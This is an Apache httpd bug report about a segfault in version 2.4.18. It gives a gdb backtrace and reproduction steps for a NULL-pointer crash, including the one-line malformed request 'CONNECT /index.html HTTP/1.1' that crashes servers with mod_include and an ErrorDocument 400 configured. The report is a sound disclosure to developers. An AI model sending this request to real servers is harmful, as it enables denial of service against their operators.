https://bz.apache.org/bugzilla/show_bug.cgi?id=58929
Bug ID: 58929
Summary: coredump when sending illegal CONNECT request
Product: Apache httpd-2
Version: 2.4.18
Hardware: PC
OS: Linux
Status: NEW
Severity: major
Priority: P2
Component: Core
Assignee: [email protected]
Reporter: [email protected]
Created attachment 33501
--> https://bz.apache.org/bugzilla/attachment.cgi?id=33501&action=edit
minimal httpd config to reproduce the issue
While playing around with httpd-2.4.18, I sent an (invalid) HTTP CONNECT
request with a URL instead of a host:port to the httpd ("CONNECT /index.html
HTTP/1.1") what resulted in immediate drop of the connection. After
investigation I found that the httpd process actually crashed (segfault).
The core reveals that the r->protocol pointer is 0x0, which is used without
check in an strcmp() call in ap_add_cgi_vars().
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x000055fdfff85243 in ap_add_cgi_vars (r=0x7f2f98003eb0) at
util_script.c:382
382 if (!strcmp(r->protocol, "INCLUDED")) {
[Current thread is 1 (Thread 0x7f2fa537d700 (LWP 31095))]
(gdb) bt
#0 0x000055fdfff85243 in ap_add_cgi_vars (r=0x7f2f98003eb0) at
util_script.c:382
#1 0x00007f2fa5b84314 in includes_filter (f=<optimized out>, b=<optimized
out>) at mod_include.c:3887
#2 0x000055fdfff6b762 in default_handler (r=0x7f2f98003eb0) at core.c:4517
#3 0x000055fdfff7d1b0 in ap_run_handler (r=r@entry=0x7f2f98003eb0) at
config.c:169
#4 0x000055fdfff7d6f9 in ap_invoke_handler (r=r@entry=0x7f2f98003eb0) at
config.c:433
#5 0x000055fdfff94a4c in ap_internal_redirect (new_uri=<optimized out>,
r=<optimized out>) at http_request.c:730
#6 0x000055fdfff67fbb in ap_read_request (conn=conn@entry=0x7f2fa000bfb8) at
protocol.c:985
#7 0x000055fdfff91a09 in ap_process_http_async_connection (c=0x7f2fa000bfb8)
at http_core.c:146
#8 ap_process_http_connection (c=0x7f2fa000bfb8) at http_core.c:248
#9 0x000055fdfff86ff0 in ap_run_process_connection (c=c@entry=0x7f2fa000bfb8)
at connection.c:41
#10 0x00007f2fa5d9357d in process_socket (my_thread_num=<optimized out>,
my_child_num=0, cs=0x7f2fa000bf28,
sock=<optimized out>, p=<optimized out>, thd=<optimized out>) at
event.c:1101
#11 worker_thread (thd=<optimized out>, dummy=<optimized out>) at event.c:1960
#12 0x00007f2fa653f314 in start_thread () from /lib/libpthread.so.0
#13 0x00007f2fa608283d in clone () from /lib/libc.so.6
I tried to create a simple httpd.conf to reproduce the problem, and found that
mod_include has to be active and an "ErrorDocument 400" directive pointing to
an actual document has to exist.
since the actual NULL pointer dereference happens in the function
ap_add_cgi_vars() which is called from some other points in the code, it is
quite
possible that other ways to trigger this issue exists.
The issue still exists in the 2.4 HEAD but was not reproducible with 2.4.17.
to reproduce:
- start apache with given httpd.conf. 400.html has to exist
- send "CONNECT /index.html HTTP/1.1" -> server crashes
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]
